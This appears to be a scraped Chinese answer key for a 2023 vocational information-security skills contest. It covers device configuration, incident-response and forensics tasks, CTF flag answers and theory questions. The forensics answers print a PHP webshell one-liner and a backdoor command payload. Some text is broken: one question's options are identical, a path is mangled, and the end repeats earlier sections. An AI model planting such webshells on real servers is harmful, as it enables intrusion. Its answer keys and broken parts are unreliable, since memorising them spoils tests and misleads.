2023年全国职业院校技能大赛信息安全管理与评估真题
0x00前言
0x02一阶段
2.1一阶段任务一
1.根据网络拓扑图所示,按照IP 地址规划表,对防火墙的名称、各接口IP 地址进行配置。共8 分,每错1 处(行)扣1 分,扣完为止。地址、安全域、接口(状态为UP)、名称都正确。
2.根据网络拓扑图所示,按照IP 地址规划表,对三层交换机的名称进行配置,创建VLAN 并将相应接口划入VLAN, 对各接口IP 地址进行配置。20分,交换机名称2分,vlan信息,IP地址,ipv6地址每错1处扣1分,扣完为止,
3.根据网络拓扑图所示,按照IP 地址规划表,对无线交换机的名称进行配置,创建VLAN 并将相应接口划入VLAN,对接口IP 地址进行配置。10 分,AC名称2分,vlan信息,IP地址,IPv6地址每错1处扣1分。
4.根据网络拓扑图所示,按照IP地址参数表,对BC的名称、各接口IP地址进行配置。(8分)名称2分,聚合端口2分,接口IP地址每个2分;
5.根据网络拓扑图所示,按照IP 地址规划表,对WEB应用防火墙的名称、各接口IP 地址进行配置。(4分)
2.2一阶段任务二
1.SW和AC开启telnet登录功能,telnet登录账户仅包含"ABC4321",密码为明文"ABC4321",采用telnet方式登录设备时需要输入enable密码,密码设置为明文"12345"。(4分)说明:admin账号没有删除扣1分,ABC4321用户的privilege 值设置为15扣 3分
AC
2.北京总公司和南京分公司租用了运营商两条裸光纤,实现内部办公互通。一条裸光纤承载公司财务部门业务,一条裸光纤承载其他内部业务。使用相关技术实现总公司财务段路由表与公司其它业务网段路由表隔离,财务业务位于VPN 实例名称CW 内,总公司财务和分公司财务能够通信,财务部门总公司和分公司之间采用RIP路由实现互相访问。(5分)若SW上show ip route vrf CW和AC上show ip route rip结果错误,本题0分。
SW:
apl
ip vrf CW
vlan 30,31
int vlan 30
ip vrf for CW
int vlan 31
ip vrf for CW
int vlan 30
ip add xxx
int vlan 31
ip add xxx
router rip
address-family ipv4 vrf cw
network 20.1.0.4/30
network 20.1.3.0/25
exit-address-familyAC:
apl
router rip
network 20.1.0.4/30
network 20.1.3.128/25
AC:
3.尽可能加大总公司核心和出口BC之间的带宽。(4分)每设备2分,SW上看端口是否千兆全双工及配置端口聚合;
SW
apl
先敲速率再做链路聚合
BC
4.为防止终端产生MAC地址泛洪攻击,请配置端口安全,已划分VLAN41的端口最多学习到5个MAC 地址,发生违规阻止后续违规流量通过,不影响已有流量并产生LOG 日志;连接PC1 的接口为专用接口,限定只允许PC1 的MAC 地址可以连接.(5分)7口配置2分,其它3个口1分,mac地址可变。
apl
mac-address-learning cpu-control:开启才能限定mac
5在总部核心交换机端口ethernet1/0/6上,将属于网段20.1.41.0内的报文带宽限制为10M比特/秒,突发值设为4M字节,超过带宽的该网段内的报文一律丢弃。(5分)policy-map配置2分,其余每框1分,(acl名称、class-map名称、policy-map名字可变,嵌套关系需要对应)
apl
ip access-list standard pc1
permit 20.1.41.0 0.0.0.255
exit
!
class-map pc1
match access-group pc1
!
policy-map pc1
class pc1
policy 10000 4000 exceed-action drop
exit
int e1/0/6
service-policy input pc1
6.在SW上配置办公用户在上班时间(周一到周五9:00-17:00)禁止访问外网,内部网络正常访问。(2分)show clock时间需在开始竞赛时间范围内,否则本题0分;
apl
time-range time #time为name
periodic weekdays 09:00:00 to 17:00:00 #周一到周五9:00-17:00
####应用ACL
ip access-list extended acl2
permit ip 20.1.41.0 0.0.0.255 20.1.0.0 0.0.255.255
deny ip 20.1.41.0 0.0.0.255 any-destination time-range time
#应用vacl 绑定vlan41
vacl ip access-group acl2 out vlan 41
7.总公司SW交换机模拟因特网交换机,通过某种技术实现本地路由和因特网路由进行隔离,因特网路由实例名internet。(2分)
8.对SW上VLAN50开启以下安全机制。业务内部终端相互二层隔离;14口启用环路检测,环路检测的时间间隔为10s,发现环路以后关闭该端口,恢复时间为30分钟,如私设DHCP服务器关闭该端口,同时开启防止ARP网关欺骗攻击。6分,端口隔离1分,arp-guard配置正确1分,环路检测配置正确2分、dhcp snooping正确2分。
9.配置使北京公司内网用户通过总公司出口BC访问因特网,分公司内网用户通过分公司出口FW访问因特网,要求总公司核心交换机9口VLAN41业务的用户访问因特网的流量往反数据流经过防火墙在通过BC访问因特网;防火墙untrust1和trust1开启安全防护,参数采用默认参数。要求有测试结果(14分)开启安全防护2分,tracert结果12分,如果结果错误,本题0分;
FW
apl
show ad zone trust
结果:
10.为了防止DOS攻击的发生,在总部交换机vlan50接口下对MAC、ARP、ND表项数量进行限制,具体要求为:最大可以学习20个动态MAC地址、20个动态ARP地址、50个NEIGHBOR表项。(3分)
11.总公司和分公司今年进行IPv6试点,要求总公司和分公司销售部门用户能够通过IPV6相互访问,IPV6业务通过租用裸纤承载。实现分公司和总公司ipv6业务相互访问;AC与SW之间配置静态路由使VLAN50与VLAN60可以通过IPv6通信;VLAN40开启IPV6,IPv6业务地址规划如下:(8分)下一跳ipv6地址需为fe80开头,否则扣4分,ping6结果错误本题0分;
SW:
AC:
12.在总公司核心交换机SW配置IPv6地址,开启路由公告功能,路由器公告的生存期为
,确保销售部门的IPv6终端可以通过DHCP SERVER 获取IPv6地址,在SW上开启IPV6 dhcp server功能,ipv6地址范围2001:da8:50::2-2001:da8:50::100。(6分)DHCPv6配置正确得1分,开启路由公告及公告生存期正确得1分,结果正确4分,如无结果或结果错误,本题0分;(结果中的DUID值为随机的,可与本文档中不一致)
结果:
13.在南京分公司上配置IPv6地址,使用相关特性实现销售部的IPv6终端可自动从网关处获得IPv6无状态地址。(6分)能获取到随机分配得ipv6地址得6分,须有临时IPV6地址;
14.SW与AC,AC与FW之间配置OSPF area 0 开启基于链路的MD5认证,密钥自定义,传播访问INTERNET 默认路由,让总公司和分公司内网用户能够相互访问包含AC上loopback1地址;总公司SW和BC之间运行静态路由协议。18分,开启MD5认证3分,show ip route ospf结果正确得12分,SW和BC配置静态路由,3分;
FW
SW
AC
BC
15.分公司销售部门通过防火墙上的DHCP SERVER获取IP地址,server IP地址为20.0.0.254,地址池范围20.1.60.10-20.1.60.100,dns-server 8.8.8.8。(5分)防火墙上show dhcp-server binding loopback_addrpool已经分配IP地址得分,否则不得分。
16.如果SW的11端口的收包速率超过30000则关闭此端口,恢复时间5分钟;为了更好地提高数据转发的性能,SW交换中的数据包大小指定为1600字节;(3分)
17.为实现对防火墙的安全管理,在防火墙FW的Trust安全域开启PING,HTTP,telnet,SNMP功能,Untrust安全域开启SSH、HTTPS功能,snmp服务器地址:20.10.28.100,团体字:skills(4分)
18.在分部防火墙上配置,分部VLAN业务用户通过防火墙访问Internet时,复用公网IP: 202.22.1.3、202.22.1.4;保证每一个源IP 产生的所有会话将被映射到同一个固定的IP 地址,当有流量匹配本地址转换规则时产生日志信息,将匹配的日志发送至20.10.28.10 的UDP 2000 端口;(5分)安全策略配置正确2分,NAT,地址簿,日志配置各1分;
19.远程移动办公用户通过专线方式接入分公司网络,在防火墙FW上配置,采用SSL方式实现仅允许对内网VLAN 61的访问,端口号使用4455,用户名密码均为ABC4321,地址池参见地址表;(8分)
VPN连接正确得4分,ping通得4分。若ping不通本题0分;
20.分公司部署了一台WEB服务器ip为20.10.28.10,接在防火墙的DMZ区域为外网用户提供web服务,要求内网用户能,ping通web服务器和访问服务器上的web服务(端口80)和远程管理服务器(端口3389),外网用户只能访问通过防火墙外网地址访问服务器web服务。(6分)目的nat 2分、策略4分
21.为了安全考虑,无线用户移动性较强,访问因特网时需要在BC上开启web认证,采用本地认证,密码账号都为web4321。
(5分)认证成功3分,过程2分;
22.由于分公司到因特网链路带宽比较低,出口只有200M带宽,需要在防火墙配置iQOS,系统中 P2P 总的流量不能超过 100M ,同时限制每用户最大下载带宽为2M,上传为1M,优先保障HTTP应用,为http预留100M带宽。(6分)每条qos策略3分;
23.为净化上网环境,要求在防火墙FW做相关配置,禁止无线用户周一至周五工作时间9:00-18:00的邮件内容中含有"病毒"、"赌博"的内容,且记录日志。(5分)每错1处扣1分,扣完为止;
24.由于总公司无线是通过分公司的无线控制器统一管理,为了防止专线故障导致无线不能使用,总公司和分公司使用互联网作为总公司无线ap和AC相互访问的备份链路。FW和BC之间通过IPSEC技术实现AP管理段与无线AC之间联通,具体要求为采用预共享密码为 ABC4321,IKE 阶段 1 采用 DH 组 1、3DES 和 MD5 加密方,IKE 阶段 2 采用 ESP-3DES,MD5。15分,结果错误本题0分;
FW
BC
25.总公司用户,通过BC访问因特网,BC采用路由方式,在BC上做相关配置,让总公司内网用户(不包含财务)通过BC外网口ip访问因特网。3分;
26.在BC上配置PPTP vpn 让外网用户能够通过PPTP vpn访问总公司SW上内网地址,用户名为test,密码test23。3分,结果错误0分;
27.为了提高分公司出口带宽,尽可能加大分公司AC和出口FW之间带宽。3分,每框1分;
FW:
AC:
28.在BC上配置url过滤策略,禁止总公司内网用户在周一到周五的早上8点到晚上18点访问外网www.skillchina.com。3分;配置2分,时间计划和地址簿各0.5分;
29.在BC上开启IPS策略,对总公司内网用户访问外网数据进行IPS防护,保护服务器、客户端和恶意软件检测,检测到攻击后进行拒绝并记录日志。3分;
30.总公司出口带宽较低,总带宽只有200M,为了防止内网用户使用p2p迅雷下载占用大量带宽需要限制内部员工使用P2P工具下载的流量,最大上下行带宽都为50M,以免P2P流量占用太多的出口网络带宽,启用阻断记录。4分,线路带宽配置1分,规则配置3分;
31.通过BC设置总公司用户在上班时间周一到周五9:00到18:00禁止玩游戏,并启用阻断记录。4分,每框2分
32.限制总公司内网用户访问因特网web视频和即时通信下行最大带宽为20M,上传为10M,启用阻断记录;4分,即时通讯显示"ALL"或者"397种"均可;
33.BC上开启黑名单告警功能,级别为预警状态,并进行邮件告警和记录日志,发现cpu使用率大于80%,内存使用大于80%时进行邮件告警并记录日志,级别为严重状态。发送邮件地址为123@163.com,接收邮件为133139123456@163.com。4分
34.分公司内部有一台网站服务器直连到WAF,地址是20.10.28.10,端口是8080,配置将服务访问日志、WEB防护日志、服务监控日志信息发送syslog日志服务器, IP地址是20.10.28.6,UDP的514端口;4分(注:日志服务器状态不启用不给分)
35.在分公司的WAF上配置,对会话安全进行防护,开启Cookie加固和加密。3分
36.编辑防护策略,定义HTTP请求最大长度为1024,防止缓冲区溢出攻击。3分
37.为防止暴力破解网站服务器,在WAF上配置对应的防护策略进行限速防护,名称为"防暴力破解",限速频率为每秒1次,严重级别为高级,记录日志;3分
38.WAF上配置阻止用户上传ZIP、DOC、JPG、RAR格式文件,规则名称为"阻止文件上传"; 4分,规则应用1分,配置3分;
39.WAF上配置对应防护规则,规则名称为"HTTP特征防护"要求对SQL注入、跨站脚本攻击XSS、信息泄露、防爬虫、恶意攻击等进行防护,一经发现立即阻断并发送邮件报警及记录日志。4分
40.WAF上配置对"www.skillchina.com",开启弱密码检测,名称配置为"弱密码检测"。3分
41.WAF上配置防跨站防护功能,规则名称为"防跨站防护"保护"www.skillchina.com"不受攻击,处理动作设置为阻断,请求方法为GET,POST方式;3分
42.由于公司IP地址为统一规划,原有无线网段IP地址为 172.16.0.0/22,为了避免地址浪费需要对ip地址进行重新分配;要求如下:未来公司预计部署ap 50台;办公无线用户vlan 10预计300人,来宾用户vlan20以及不超过30人;6分,每框2分;
43.AC 上配置DHCP,管理VLAN 为VLAN100,为AP 下发管理地址,网段中第一个可用地址为AP 管理地址,最后一个可用地址为网关地址,AP通过DHCP opion 43注册,AC地址为loopback1地址;为无线用户VLAN10,20下发IP 地址,最后一个可用地址为网关;6分,开启DHCP服务1分,DHCP地址池配置2分,无线IP地址配置1分,AP注册成功2分,若AP注册不成功,本题0分;
AC
44.在NETWORK下配置SSID,需求如下:
NETWORK 1下设置SSID ABC4321,VLAN10,加密模式为wpa-personal,其口令为43214321;4分
45.NETWORK 2下设置SSID GUEST,VLAN20不进行认证加密,做相应配置隐藏该SSID;3分,每条1分;
46.NETWORK 2开启内置portal+本地认证的认证方式,账号为test密码为test4321;6分,配置2分,有客户端认证结果4分,无结果或结果错误本题0分;
47.配置SSID GUEST每天早上0点到6点禁止终端接入; GUSET最多接入10个用户,并对GUEST网络进行流控,上行1M,下行2M;配置所有无线接入用户相互隔离;6分,限时配置1分,qos配置3分,最大用户1分,用户隔离1分。
48.配置当AP上线,如果AC中储存的Image版本和AP的Image版本号不同时,会触发AP自动升级;配置AP发送向无线终端表明AP存在的帧时间间隔为2秒;配置AP失败状态超时时间及探测到的客户端状态超时时间都为2小时; 4分;ap自动升级1分,失败状态超时时间1分,客户端状态超时1分,帧间隔1分;
49.为了提高wifi用户体验感,拒绝弱信号终端接入,设置阈值低于50的终端接入无线信号;为防止非法AP假冒合法SSID,开启AP威胁检测功能;4分,信号值设置2分,AP威胁检测2分;
50.通过配置防止多AP和AC相连时过多的安全认证连接而消耗CPU资源,检测到AP与AC在10分钟内建立连接5次就不再允许继续连接,两小时后恢复正常。3分
0x02二阶段
2.1 CentOS服务器应急响应(70分)
A集团的应用服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。
受攻击的Server服务器已整体打包成虚拟机文件保存,请选手自行导入分析。用户名:root,密码:nanyidian...
| 序号 | 任务内容 | 答案 |
|---|---|---|
| 1 | 请提交网站管理员的用户名和密码 | manager1/863211 |
| 2 | 攻击者通过应用后台修改了某文件获取了服务器权限,请提交该文件的文件名 | footer.php |
| 3 | 攻击者通过篡改文件后,可通过该网站官网进行任意未授权命令执行,请提交利用该木马执行phpinfo的payload,例如:/shell.php?cmd=phpinfo(); | /?pass=phpinfo(); |
| 4 | 攻击者进一步留下的免杀的webshell在网站中,请提交该shell的原文最简式,例如: <?php ...?> | <?php eval($_POST['loveU']);?> |
| 5 | 攻击者修改了某文件,导致webshell删除后会自动生成,请提交该文件的绝对路径 | /etc/crontab |
| 6 | 请提交网站服务连接数据库使用的数据库账号和密码 | wordpress/wordpress-pass |
| 7 | 请提交攻击者在数据库中留下的信息,格式为:flag{...} | flag{th1s_ls_fl44444g1} |
2.2 基于Windows的内存取证(40分)
A集团某服务器系统感染恶意程序,导致系统关键文件被破坏,请分析A集团提供的系统镜像和内存镜像,找到系统镜像中的恶意软件,分析恶意软件行为。
本任务素材清单:内存镜像(*.raw)。
请按要求完成该部分的工作任务。
| 序号 | 任务内容 | 答案 |
|---|---|---|
| 1 | 请指出内存中疑似恶意进程 | .hack.ex |
| 2 | 请指出该员工使用的公司OA平台的密码 | liuling7541 |
| 3 | 黑客传入一个木马文件并做了权限维持,请问木马文件名是什么 | h4ck3d! |
| 4 | 请提交该计算机中记录的重要联系人的家庭住址 | 秋水省雁荡市碧波区千屿山庄1号 |
2.3 通信数据分析取证(50分)
A集团的网络安全监控系统发现恶意份子正在实施高级可持续攻击(APT),并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,分解出隐藏的恶意程序,并分析恶意程序的行为。
| 序号 | 任务内容 | 答案 |
|---|---|---|
| 1 | 请提交网络数据包中传输的可执行的恶意程序文件名 | happy.docx |
| 2 | 请提交该恶意程序下载载荷的ip和端口 | 10.78.128.154:9090 |
| 3 | 请提交恶意程序载荷读取的本地文件名(含路径) | c:tmpsecret.txt |
| 4 | 请提交恶意程序读取的本地文件的内容 | f6dff95c2ec911ebbede0cdd24f6bd6d |
2.4 通信数据分析取证(50分)
对给定取证镜像文件进行分析,搜寻证据关键字(线索关键字为"evidence 1"、"evidence 2"、......、"evidence 10",有文本形式也有图片形式,不区分大小写),请提取和固定比赛要求的标的证据文件,并按样例的格式要求填写相关信息,证据文件在总文件数中所占比例不低于15%。取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)。
| 证据编号 | 在取证镜像中的文件名 | 镜像中原文件Hash码(MD5,不区分大小写) |
|---|---|---|
| evidence 1 | lili.gif | 900EA4D6698613298AEDE3DF36BA92B8 |
| evidence 2 | qwe.dll | FB99F9C2C207281E0CD7A29E976F1CDD |
| evidence 3 | dudu.xlsx | 2437FD58491FBCA528B49B4AC7089425 |
| evidence 4 | vbdg.docx | 6B8DFFA9586C6D99B559C79A2105D855 |
| evidence 5 | four_Digit.jpg | 509998568BEAFA5D6C950493220F783D |
| evidence 6 | jiko.py | 68BB1999633DBB422C164AA4F664897B |
| evidence 7 | INbud.bmp | 9CEADE34EB17E135E24CB7937A600ADC |
| evidence 8 | 0N0n.jpg | 45EB5309A774F1DB0B3B996584EB4326 |
| evidence 9 | buhu | 900AA268F3BF119233CB2F05D5B8FAFD |
| evidence 10 | yiji.doc | F70BBEC2D9AC8A4658D262D2695824EA |
0x03 三阶段
复盘模拟文章
2023年全国职业院校技能大赛信息安全管理与评估-3阶段web复盘模拟解析
0x01 前言最近刚比完的赛,非常坐牢也没有获奖但是趁着对这题还有印象深刻复盘模拟一下,本题环境是凭证记忆去模拟的...
3.1 人力资源管理系统(45分)
| 任务编号 | 任务描述 | 答案 | 分值 |
|---|---|---|---|
| 任务一 | 请对人力资源管理系统进行黑盒测试,利用漏洞找到flag1,并将flag1提交。flag1格式flag1{<flag值>} | flag1{4a585509-abfe-4f32-961f-076745205597} | 15 |
| 任务二 | 请对人力资源管理系统进行黑盒测试,利用漏洞找到flag2,并将flag2提交。flag2格式flag2{<flag值>} | flag2{bfbf52fe-2504-4395-b6ba-523c8d6403c0} | 15 |
| 任务三 | 请对人力资源管理系统进行黑盒测试,利用漏洞找到flag3,并将flag3提交。flag3格式flag3{<flag值>} | flag3{488ea2a5-8fb9-472d-be31-f955de615ce4} | 15 |
3.2 邮件系统(30分)
| 任务编号 | 任务描述 | 答案 | 分值 |
|---|---|---|---|
| 任务四 | 请对邮件系统进行黑盒测试,利用漏洞找到flag1,并将flag1提交。flag1格式flag1{<flag值>} | flag1{19d299cb-3935-46ae-94fb-d8c936881295} | 15 |
| 任务五 | 请对邮件系统进行黑盒测试,利用漏洞找到flag2,并将flag2提交。flag2格式flag2{<flag值>} | flag2{44cae0f5-c9fe-4f26-8eb1-45f735dd9846} | 15 |
3.3 FTP服务器(165分)
| 任务编号 | 任务描述 | 答案 | 分值 |
|---|---|---|---|
| 任务六 | 请获取FTP服务器上task6目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{5BC925649CB0188F52E617D70929191C} | 15 |
| 任务七 | 请获取FTP服务器上task7目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{eaf021ef-5c75-47f2-80dc-db677020a3db} | 15 |
| 任务八 | 请获取FTP服务器上task8目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{03c174ab-f0f0-6935-5435-836dc2518625} | 20 |
| 任务九 | 请获取FTP服务器上task9目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{7113c8ed-709b-465b-a06a-30051e62bd01} | 25 |
| 任务十 | 请获取FTP服务器上task10目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{6ed4c74e022cb18c8039e96de93aa9ce} | 20 |
| 任务十一 | 请获取FTP服务器上task11目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{8aa3c5cc-96fc-41e3-c2b2ebe53030} | 25 |
| 任务十二 | 请获取FTP服务器上task12目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{6e0ed660-9803-4933-8488-8ac33f8ef097} | 20 |
| 任务十三 | 请获取FTP服务器上task13目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{<flag值>} | flag{10a43302-3e2a-0c01-7aec-3a03e1cd9a02} | 25 |
3.4 应用系统服务器(30分)
| 任务编号 | 任务描述 | 答案 | 分值 |
|---|---|---|---|
| 任务十四 | 应用系统服务器10000端口存在漏洞,获取FTP服务器上task14目录下的文件进行分析,请利用漏洞找到flag,并将flag提交。flag格式flag{<flag值>} | flag{d2725e77-3235-479a-8b30-163d40f63da4} | 30 |
3.5 运维服务器(30分)
| 任务编号 | 任务描述 | 答案 | 分值 |
|---|---|---|---|
| 任务十五 | 测试系统服务器10001端口存在漏洞,获取FTP服务器上task15目录下的文件进行分析,请利用漏洞找到flag,并将flag提交。flag格式flag{<flag值>} | flag{764863c8-0020-47bd-abb1-b631ba9e2e0a} | 30 |
0x04理论题
单选题 (每题2分,共35题,共70分)
1、应急事件响应和恢复措施的目标是( B )。
A、保证信息安全
B、最小化事件的影响
C、找出事件的责任人
D、加强组织内部的监管
2、下列数据类型不属于静态数据提取的数据类型( C )。
A、系统日志
B、系统进程
C、网络数据包
D、文件元数据
3、安全评估的方法不包括( C )。
A、风险评估
B、威胁建模
C、减少漏洞
D、渗透测试
4、以下不属于入侵监测系统的是( C ) 。
A、 AAFID系统
B、 SNORT系统
C、 IETF系统
D、 NETEYE系统
5、通过TCP序号猜测,攻击者可以实施下列哪一种攻击?( D )
A、 端口扫描攻击
B、 ARP欺骗攻击
C、 网络监听攻击
D、 TCP会话劫持攻击
6、下面不是数据库的基本安全机制的是( D ) 。
A、 用户认证
B、 用户授权
C、 审计功能
D、 电磁屏蔽
7、假设创建了名为f的实例,如何在f中调用类的add_food函数?( D )
A、 f(add_food())
B、 f.[add_food()]
C、 f.add_food
D、 f.add_food()
8、aspx 的网站配置文件一般存放在哪个文件里?( C )
A、 conn.asp
B、 config.php
C、 web.config
D、 index.aspx
9、一个基于特征的IDS应用程序需要下列选项中的哪一项来对一个攻击做出反应?( B )
A、 正确配置的DNS
B、 正确配置的规则
C、 特征库
D、 日志
10、完成数据库应用系统的设计并进行实施后,数据库系统进入运行维护阶段。下列工作中不属于数据库运行维护工作的是( D ) 。
A、 恢复数据库数据以核查问题
B、 为了保证安全,定期修改数据库用户的密码
C、 更换数据库服务器以提高应用系统运行速度
D、 使用开发人员提供的SQL语句易始化数据库中的表
11、以下不属入侵检测中要收集的信息的是( B ) 。
A、 系统和网络日志文件
B、 目录和文件的内容
C、 程序执行中不期望的行为
D、 物理形式的入侵信息
12、POP3服务器使用的监听端口是?( B )
A、 TCP的25端口
B、 TCP的110端口
C、 UDP的25端口
D、 UDP的110端口
13、目标计算机与网关通信失败,更会导致通信重定向的攻击形式是?( D )
A、 病毒
B、 木马
C、 DOS
D、 ARP欺骗
14、________的目的是发现目标系统中存在的安全隐患,分析所使用的安全机制是否能够保证系统的机密性、完整性和可用性。( A )
A、 漏洞分析
B、 入侵检测
C、 安全评估
D、 端口扫描
15、以下哪一项描述不正确?( C )
A、 ARP是地址解析协议
B、 TCP/IP传输层协议有TCP和UDP
C、 UDP协议提供的是可靠传输
D、 IP协议位于TCP/IP网际层
16、如果想在类中创建私有方法,下面哪个命名是正确的?( C )
A、 _add_one
B、 add_one
C、 add_one
D、 add_one
17、MD5的主循环有( B ) 轮。
A、 3
B、 4
C、 5
D、 8
18、根据网络安全应急处理流程,应急启动后,应该进行哪一步( B ) 。
A、 归类&定级
B、 应急处置
C、 信息通报
D、 后期处理
19、( )是一种架构在公用通信基础设施上的专用数据通信网络,利用 IPSec 等网络层安全协议和建立在 PKI 上的加密与签名技术来获得私有性。( C )
A、 SET
B、 DDN
C、 VPN
D、 PKIX
20、假设系统中有n个用户,他们使用对称加密体制实现保密通信,那么系统中共需要管理( n(n-1)/2)个密钥,每个用户需要保存( A ) 个密钥。
A、 n-1
B、 2n
C、 Cn2
D、 n!
21、什么是数据库安全的第一道保障()。( C )
A、 操作系统的安全
B、 数据库管理系统层次
C、 网络系统的安全
D、 数据库管理员
22、下列方法中不能用来进行DNS欺骗的是?( D )
A、 缓存感染
B、 DNS信息劫持
C、 DNS重定向
D、 路由重定向
23、下列选项哪列不属于网络安全机制?( C )
A、 加密机制
B、 数据签名机制
C、 解密机制
D、 认证机制
24、部署大中型 IPSEC VPN 时,从安全性和维护成本考虑,建议采取什么样的技术手段提供设备间的身份验证。( B )
A、 预共享密钥
B、 数字证书
C、 路由协议验证
D、 802.1x
25、现今非常流行的SQL(数据库语言)注入攻击属于下列哪一项漏洞的利用?( C )
A、 域名服务的欺骗漏洞
B、 邮件服务器的编程漏洞
C、 WWW服务的编程漏洞
D、 FTP服务的编程漏洞
26、维吉利亚(Vigenere)密码是古典密码体制比较有代表性的一种密码,其密码体制采用的是( C ) 。
A、 置换密码
B、 单表代换密码
C、 多表代换密码
D、 序列密码
27、如果VPN网络需要运行动态路由协议并提供私网数据加密,通常采用什么技术手段实现( B ) 。
A、 GRE
B、 GRE+IPSEC
C、 L2TP
D、 L2TP+IPSEC
28、过滤所依据的信息来源不包括?( D )
A、 IP包头
B、 TCP包头
C、 UDP包头
D、 IGMP包头
29、bind9的日志默认保存在?( C )
A、 /var/log/named.log
B、 /var/log/named/named.log
C、 /var/named/data/named.run
D、 /var/log/data/named.run
30、一个完整的密码体制,不包括以下( C )要素。
A、 明文空间
B、 密文空间
C、 数字签名
D、 密钥空间
31、Linux系统中,添加用户的命令是?( C )
A、 net user test /add
B、 user add test
C、 useradd test
D、 test useradd
32、以下关于正则表达式,说法错误的是?( D )
A、 'root'表示匹配包含root字符串的内容
B、 '.'表示匹配任意字符
C、 [0-9]表示匹配数字
D、 '^root'表示取反
33、将用户user123修改为管理员权限命令是 ( C ) 。
A、 net user localgroup administrators user123 /add
B、 net use localgroup administrators user123 /add
C、 net localgroup administrators user123 /add
D、 net localgroup administrator user123 /add
34、VIM模式切换的说法中,正确的是?( A )
A、 命令模式通过i命令进入输入模式
B、 输入模式通过:切换到末行模式
C、 命令模式通过ESC键进入末行模式
D、 末行模式通过i进入输入模式
35、在常见的安全扫描工具中,以下( C ) 主要用来分析Web站点的漏洞,可以针对数千种常见的网页漏洞或安全风险进行检测。
A、 SuperScan
B、 Fluxay(流光)
C、 Wikto
D、 MBSA
二、 多选题 (每题3分,共10题,共30分)
1、在动态易失数据提取及固定过程中,为了提高数据准确性,以下( ABC )技术不对数据传输造成影响
A、数据库触发器
B、数据加密技术
C、数据压缩校验
D、网络延迟
2、在应急响应流程中,以下( ABC )方法适合收集信息。
A、监控系统
B、系统日志分析
C、询问用户
D、随机抽样调查
3、关于函数中变量的定义,哪些说法是正确的?( AC )
A、 即使函数外已经定义了这个变量,函数内部仍然可以定义
B、 如果一个函数已经定义了name变量,那么其他的函数就不能再定义
C、 函数可以直接引用函数外部定义过的变量
D、 函数内部只能定义一个变量
4、下面标准可用于评估数据库的安全级别的有( ABCD )
A、 TCSEC
B、 IFTSEC
C、 CC DBMS.PP
D、 GB17859-1999
5、安全的网络通信必须考虑以下哪些方面?( ABCD )
A、 加密算法
B、 用于加密算法的秘密信息
C、 秘密信息的分布和共享
D、 使用加密算法和秘密信息以获得安全服务所需的协议
6、RC4加密算法被广泛应用,包括( ABC )
A、 SSL/TLS
B、 WEP协议
C、 WPA协议
D、 数字签名
7、VIM的工作模式,包括哪些?( ABD )
A、 命令模式
B、 输入模式
C、 高亮模式
D、 底行模式
8、在反杀伤链中,情报可以分为那几个层次?( BCD )
A、 战斗
B、 战略
C、 战区
D、 战术
9、我国现行的信息安全法律体系框架分为( ABC )三个层面。
A、信息安全相关的国家法律
B、信息安全相关的行政法规和部分规章
C、信息安全相关的地方法规/规章和行业规定
D、信息安全相关的个人职业素养
10、信息道德与信息安全问题一直存在的原因有( ABCD )。
A、信息系统防护水平不高
B、信息安全意识不强
C、信息安全法律法规不完善
D、网络行为道德规范尚未形成
文章目录
-
0x00前言
-
0x02一阶段
-
0x02二阶段
-
- 2.1 CentOS服务器应急响应(70分)
- 2.2 基于Windows的内存取证(40分)
- 2.3 通信数据分析取证(50分)
- 2.4 通信数据分析取证(50分)
-
0x03 三阶段
-
0x04理论题
样调查
3、关于函数中变量的定义,哪些说法是正确的?( AC )
A、 即使函数外已经定义了这个变量,函数内部仍然可以定义
B、 如果一个函数已经定义了name变量,那么其他的函数就不能再定义
C、 函数可以直接引用函数外部定义过的变量
D、 函数内部只能定义一个变量
4、下面标准可用于评估数据库的安全级别的有( ABCD )
A、 TCSEC
B、 IFTSEC
C、 CC DBMS.PP
D、 GB17859-1999
5、安全的网络通信必须考虑以下哪些方面?( ABCD )
A、 加密算法
B、 用于加密算法的秘密信息
C、 秘密信息的分布和共享
D、 使用加密算法和秘密信息以获得安全服务所需的协议
6、RC4加密算法被广泛应用,包括( ABC )
A、 SSL/TLS
B、 WEP协议
C、 WPA协议
D、 数字签名
7、VIM的工作模式,包括哪些?( ABD )
A、 命令模式
B、 输入模式
C、 高亮模式
D、 底行模式
8、在反杀伤链中,情报可以分为那几个层次?( BCD )
A、 战斗
B、 战略
C、 战区
D、 战术
9、我国现行的信息安全法律体系框架分为( ABC )三个层面。
A、信息安全相关的国家法律
B、信息安全相关的行政法规和部分规章
C、信息安全相关的地方法规/规章和行业规定
D、信息安全相关的个人职业素养
10、信息道德与信息安全问题一直存在的原因有( ABCD )。
A、信息系统防护水平不高
B、信息安全意识不强
C、信息安全法律法规不完善
D、网络行为道德规范尚未形成
文章目录
-
0x00前言
-
0x02一阶段
-
0x02二阶段
-
- 2.1 CentOS服务器应急响应(70分)
- 2.2 基于Windows的内存取证(40分)
- 2.3 通信数据分析取证(50分)
- 2.4 通信数据分析取证(50分)
-
0x03 三阶段
-
0x04理论题